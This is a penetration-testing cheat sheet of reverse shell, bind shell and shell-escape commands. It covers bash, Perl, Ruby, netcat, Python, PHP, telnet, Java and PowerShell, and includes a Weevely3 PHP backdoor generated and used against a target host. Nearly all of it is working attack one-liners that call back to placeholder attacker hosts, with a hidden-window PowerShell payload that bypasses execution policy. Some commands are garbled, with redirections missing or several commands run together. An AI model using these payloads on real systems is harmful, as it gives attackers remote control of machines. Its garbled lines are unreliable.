Link to this headingShells

Reverse Shell Generator

Link to this headingUpgrading simple shells to fully interactive TTYs

>>> msfvenom -l payloads | grep "cmd/unix"| awk '{print $1}' >>> msfvenom -p cmd/unix/reverse_netcat LHOST=[IPADDR] LPORT=[PORT]

Link to this headingBash

Link to this headingTEE

echo "evil script code" | tee script.sh

Link to this headingxterm

One of the simplest forms of reverse shell is an xterm session. The following command should be run on the server. It will try to connect back to you (10.0.0.1) on TCP port 6001.
xterm -display 10.0.0.1:1

To catch the incoming xterm, start an X-Server (:1 – which listens on TCP port 6001). One way to do this is with Xnest (to be run on your system):
Xnest :1

You’ll need to authorize the target to connect to you (command also run on your host):
xhost +targetip

Link to this headingVIM

  1. Open vi or vim and type: :set shell=/bin/bash
  2. Next, type and execute :shell or :! /bin/bash

Link to this headingAWK

awk 'BEGIN {system("/bin/sh")}'

Link to this headingGAWK

#!/usr/bin/gawk -f BEGIN { Port = 8080 Prompt = "bkd> " Service = "/inet/tcp/" Port "/0/0" while (1) { do { printf Prompt |& Service Service |& getline cmd if (cmd) { while ((cmd |& getline) > 0) print $0 |& Service close(cmd) } } while (cmd != "exit") close(Service) } }

Link to this headingFIND

find / -name blahblah 'exec /bin/awk 'BEGIN {system("/bin/sh")}' \;

Link to this headingMORE/LESS/MAN

After you use the ‘more’, ‘less’, or ‘man’ command with a file, type ‘!’ followed by a command. For instance, try the following once inside the file:

'! /bin/sh' '!/bin/sh' '!bash'

Link to this headingReverse Shell

bash -i >& /dev/tcp/[IPADDR]/[PORT] 0>&1
0<&196;exec 196<>/dev/tcp/[IPADDR]/[PORT]; sh <&196 >&196 2>&196

Link to this headingPerl

Link to this headingShell

perl -e 'exec "/bin/sh";'
exec "/bin/sh";

Link to this headingReverse Shell

perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"[IPADDR]:[PORT]");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'

Windows Only

perl -MIO -e '$c=new IO::Socket::INET(PeerAddr,"[IPADDR]:[PORT]");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'

Link to this headingRuby

Link to this headingShell

exec "/bin/sh"

Link to this headingReverse Shell

ruby -rsocket -e 'exit if fork;c=TCPSocket.new("[IPADDR]","[PORT]");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end' ruby -rsocket -e 'f=TCPSocket.open("[IPADDR]",[PORT]).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'

Windows Only

ruby -rsocket -e 'c=TCPSocket.new("[IPADDR]","[PORT]");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'

Link to this headingNetcat Reverse Shell

Linux:

nc -c /bin/sh [IPADDR] [PORT] /bin/sh | nc [IPADDR] [PORT] rm -f /tmp/p; mknod /tmp/p p && nc [IPADDR] [PORT] 0/tmp/p

Windows:

nc -nv 4444 -e cmd.exe nc -nv {ip} {port} -e cmd.exe

Link to this headingPython

Link to this headingShell

Link to this headingReverse Shell

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("[IPADDR]",[PORT]));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
python -c 'import pty; pty.spawn("/bin/bash")'
exit_code = os.system('/bin/sh'); output = os.popen('/bin/sh').read()

Link to this headingPHP

Link to this headingShell

php -r '$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i <&3 >&3 2>&3");'
<?php $output = shell_exec('ls ../../'); echo "<pre>$output</pre>"; ?>

php-reverse-shell

Weevly3

root@k22:~/Downloads/post-exploitation/weevely3# ./weevely.py generate some_password /root/Desktop/backdoor.php Generated backdoor with password 'some_password' in '/root/Desktop/backdoor.php' of 1332 byte size. #upload the shell (somewhere accessible) #access the URL where the backdoor is located(http://192.168.230.150:8081/images/shells/backdoor.php) #then execute root@k22:~/Downloads/post-exploitation/weevely3# ./weevely.py http://192.168.230.150:8081/images/shells/backdoor.php some_password [+] weevely 3.2.0 [+] Target: 192.168.230.150:8081 [+] Session: /root/.weevely/sessions/192.168.230.150/backdoor_0.session [+] Browse the filesystem or execute commands starts the connection [+] to the target. Type :help for more information. weevely> whoami www-data

Link to this headingReverse Shell

php -r '$sock=fsockopen("[IPADDR]",[PORT]);exec("/bin/sh -i <&3 >&3 2>&3");'

Link to this headingTelnet Reverse Shell

rm -f /tmp/p; mknod /tmp/p p && telnet [IPADDR] [PORT] 0/tmp/p
telnet attackerip 4444 | /bin/bash | telnet attackerip 4445

Link to this headingJava

Link to this headingShell

r = Runtime.getRuntime() p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/10.0.0.1/2002;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[]) p.waitFor()

Link to this headingNetcat

nc -e /bin/sh 10.0.0.1 1234 rm /tmp/f; mkfifo /tmp/f; cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 >/tmp/f nc -c /bin/sh attackerip 4444 /bin/sh | nc attackerip 4444 rm -f /tmp/p; mknod /tmp/p p && nc attackerip 4444 0/tmp/p

Link to this headingPowershell

Link to this headingReverse Shell

powershell -NoP -NonI -W Hidden -Exec Bypass -Command New-Object System.Net.Sockets.TCPClient("[IPADDR]",[PORT]);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()